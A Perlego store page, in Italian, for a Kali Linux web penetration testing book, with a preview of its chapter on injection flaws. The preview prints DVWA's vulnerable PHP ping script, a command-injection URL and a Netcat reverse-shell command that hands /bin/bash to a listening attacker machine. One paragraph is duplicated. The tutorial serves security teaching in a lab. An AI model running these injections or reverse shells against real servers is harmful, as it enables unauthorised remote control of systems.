eBook - ePub
Web Penetration Testing with Kali Linux
Gilberto Najera-Gutierrez, Juned Ahmed Ansari
This is a test
Condividi libro
- 426 pagine
- English
- ePUB (disponibile sull'app)
- Disponibile su iOS e Android
eBook - ePub
Web Penetration Testing with Kali Linux
Gilberto Najera-Gutierrez, Juned Ahmed Ansari
Dettagli del libro
Anteprima del libro
Indice dei contenuti
Citazioni
Informazioni sul libro
Build your defense against web attacks with Kali Linux, including command injection flaws, crypto implementation layers, and web application security holes
Key Features
- Know how to set up your lab with Kali Linux
- Discover the core concepts of web penetration testing
- Get the tools and techniques you need with Kali Linux
Book Description
Web Penetration Testing with Kali Linux - Third Edition shows you how to set up a lab, helps you understand the nature and mechanics of attacking websites, and explains classical attacks in great depth. This edition is heavily updated for the latest Kali Linux changes and the most recent attacks. Kali Linux shines when it comes to client-side attacks and fuzzing in particular.
From the start of the book, you'll be given a thorough grounding in the concepts of hacking and penetration testing, and you'll see the tools used in Kali Linux that relate to web application hacking. You'll gain a deep understanding of classicalSQL, command-injection flaws, and the many ways to exploit these flaws. Web penetration testing also needs a general overview of client-side attacks, which is rounded out by a long discussion of scripting and input validation flaws.
There is also an important chapter on cryptographic implementation flaws, where we discuss the most recent problems with cryptographic layers in the networking stack.
The importance of these attacks cannot be overstated, and defending against them is relevant to most internet users and, of course, penetration testers.
At the end of the book, you'll use an automated technique called fuzzing to identify flaws in a web application. Finally, you'll gain an understanding of web application vulnerabilities and the ways they can be exploited using the tools in Kali Linux.
What you will learn
- Learn how to set up your lab with Kali Linux
- Understand the core concepts of web penetration testing
- Get to know the tools and techniques you need to use with Kali Linux
- Identify the difference between hacking a web application and network hacking
- Expose vulnerabilities present in web servers and their applications using server-side attacks
- Understand the different techniques used to identify the flavor of web applications
- See standard attacks such as exploiting cross-site request forgery and cross-site scripting flaws
- Get an overview of the art of client-side attacks
- Explore automated attacks such as fuzzing web applications
Who this book is for
Since this book sets out to cover a large number of tools and security fields, it can work as an introduction to practical security skills for beginners in security. In addition, web programmers and also system administrators would benefit from this rigorous introduction to web penetration testing. Basic system administration skills are necessary, and the ability to read code is a must.
Domande frequenti
Come faccio ad annullare l'abbonamento?
È semplicissimo: basta accedere alla sezione Account nelle Impostazioni e cliccare su "Annulla abbonamento". Dopo la cancellazione, l'abbonamento rimarrà attivo per il periodo rimanente già pagato. Per maggiori informazioni, clicca qui
È possibile scaricare libri? Se sì, come?
Al momento è possibile scaricare tramite l'app tutti i nostri libri ePub mobile-friendly. Anche la maggior parte dei nostri PDF è scaricabile e stiamo lavorando per rendere disponibile quanto prima il download di tutti gli altri file. Per maggiori informazioni, clicca qui
Che differenza c'è tra i piani?
Entrambi i piani ti danno accesso illimitato alla libreria e a tutte le funzionalità di Perlego. Le uniche differenze sono il prezzo e il periodo di abbonamento: con il piano annuale risparmierai circa il 30% rispetto a 12 rate con quello mensile.
Cos'è Perlego?
Perlego è un servizio di abbonamento a testi accademici, che ti permette di accedere a un'intera libreria online a un prezzo inferiore rispetto a quello che pagheresti per acquistare un singolo libro al mese. Con oltre 1 milione di testi suddivisi in più di 1.000 categorie, troverai sicuramente ciò che fa per te! Per maggiori informazioni, clicca qui.
Perlego supporta la sintesi vocale?
Cerca l'icona Sintesi vocale nel prossimo libro che leggerai per verificare se è possibile riprodurre l'audio. Questo strumento permette di leggere il testo a voce alta, evidenziandolo man mano che la lettura procede. Puoi aumentare o diminuire la velocità della sintesi vocale, oppure sospendere la riproduzione. Per maggiori informazioni, clicca qui.
Web Penetration Testing with Kali Linux è disponibile online in formato PDF/ePub?
Sì, puoi accedere a Web Penetration Testing with Kali Linux di Gilberto Najera-Gutierrez, Juned Ahmed Ansari in formato PDF e/o ePub, così come ad altri libri molto apprezzati nelle sezioni relative a Computer Science e Cyber Security. Scopri oltre 1 milione di libri disponibili nel nostro catalogo.
Informazioni
Detecting and Exploiting Injection-Based Flaws
According to the OWASP Top 10 2013 list (https://www.owasp.org/index.php/Top_10_2013-Top_10), the most critical flaw in web applications is the injection flaw, and it has maintained its position in the 2017 list
(https://www.owasp.org/index.php/Top_10-2017_Top_10) release candidate. Interactive web applications take the input from the user, process it, and return the output to the client. When the application is vulnerable to an injection flaw, it accepts the input from the user without proper or even with any validation and still processes it. This results in actions that the application did not intend to perform. The malicious input tricks the application, forcing the underlying components to perform tasks for which the application was not programmed. In other words, an injection flaw allows the attacker to control components of the application at will.
(https://www.owasp.org/index.php/Top_10-2017_Top_10) release candidate. Interactive web applications take the input from the user, process it, and return the output to the client. When the application is vulnerable to an injection flaw, it accepts the input from the user without proper or even with any validation and still processes it. This results in actions that the application did not intend to perform. The malicious input tricks the application, forcing the underlying components to perform tasks for which the application was not programmed. In other words, an injection flaw allows the attacker to control components of the application at will.
In this chapter, we will discuss the major injection flaws in today's web applications, including tools to detect and exploit them, and how to avoid being vulnerable or to fix existing flaws. These flaws include the following:
- Command injection flaw
- SQL injection flaw
- XML-based injections
- NoSQL injections
An injection flaw is used to gain access to the underlying component to which the application is sending data, to execute some task. The following table shows the most common components used by web applications that are often targeted by an injection attack when the input from the user is not sanitized by the application:
| Components | Injection flaws |
| Operating system | Command injection |
| Database | SQL/NoSQL injection |
| Web browser / client | Cross-Site Scripting |
| LDAP directory | LDAP injection |
| XML | XPATH / XML External Entity injection |
Command injection
Web applications, which are dynamic in nature, may use scripts to invoke some functionality within the operating system on the web server to process the input received from the user. An attacker may try to get this input processed at the command line by circumventing the input validation filters implemented by the application. Command injection usually invokes commands on the same web server, but it is possible that the command can be executed on a different server, depending on the architecture of the application.
Let's take a look at a simple code snippet, that is vulnerable to a command injection flaw, taken from DVWA's command injection exercise. It is a very simple script that receives an IP address and sends pings (ICMP packets) to that address:
<?php $target = $_REQUEST[ 'ip' ]; $cmd = shell_exec( 'ping -c 3 ' . $target ); $html .= '<pre>'.$cmd.'</pre>'; echo $html; ?>
As you can see, there is no input validation before accepting the ip parameter from the user, which makes this code vulnerable to a command injection attack. To log in to DVWA, the default credentials are admin/admin.
A malicious user might use the following request to pipe in additional commands, which the application would accept without raising an exception:
http://server/page.php?ip=127.0.0.1;uname -a
The application takes the value of the user input from the client without validation and concatenates it to the ping -c 3 command in order to build the final command that is run on the web server. The response from the server is shown in the following screenshot. The version of the underlying OS is displayed along with the result of pinging the given address as the application failed to validate the user input:
The additional command injected will run using the privileges of the web server. Most web servers nowadays run with restricted privileges, but even with limited rights, the attacker can exploit and steal significant information.
Command injection can be used to make the server download and execute malicious files by injecting the wget commands, or to gain a remote shell to the server, as demonstrated in the following example.
First, set up a listener in Kali Linux. Netcat has a very simple way of doing this:
nc -lvp 12345
Kali Linux is now set to listen for a connection on port 12345. Next, inject the following command into the vulnerable server:
nc.traditional -e /bin/bash 10.7.7.4 12345
On some modern Linux systems, the original Netcat has been replaced by a version that doesn't include some options that may have posed a security risk, such as -e, which allows the execution of commands upon connection. These systems often include the traditional version of Netcat in a command called nc.traditional. When trying to use Netcat to gain access to a remote system, try both options.
Notice that 10.7.7.4 is the IP address of the Kali machine in the example, and 12345 is the TCP port listening for the connection. After sending the request, you should receive the connection in your Kali Linux and be able to issue commands in a noninteractive shell:
A noninteractive shell allows you to execute commands and see the results, but not interact with the commands nor see the error output, such as when using a text editor.
Identifying parameters to inject data
When you are testing a web application for command injection flaws, and you have confirmed that the application is interacting with the command line of the underlying OS, the next step is to manipulate and probe the different parameters in the application and view their responses. The following parameters should be tested for command injection flaws as the application may be using one of these parameters to build a command back on the web server:
- GET: With this method, input parameters are sent in URLs. In the example shown earlier, the input from the client was passed to the server using the GET method and was vulnerable to a command injection flaw. Any user-controlled parameter sent using the GET method request should be tested.
- POST: In this method, the input parameters are sent in the HTTP body. Similar to the input being passed using the GET method; data taken from the end user can also be passed using the POST method in the body of the HTTP request. This could then be used by the web applic...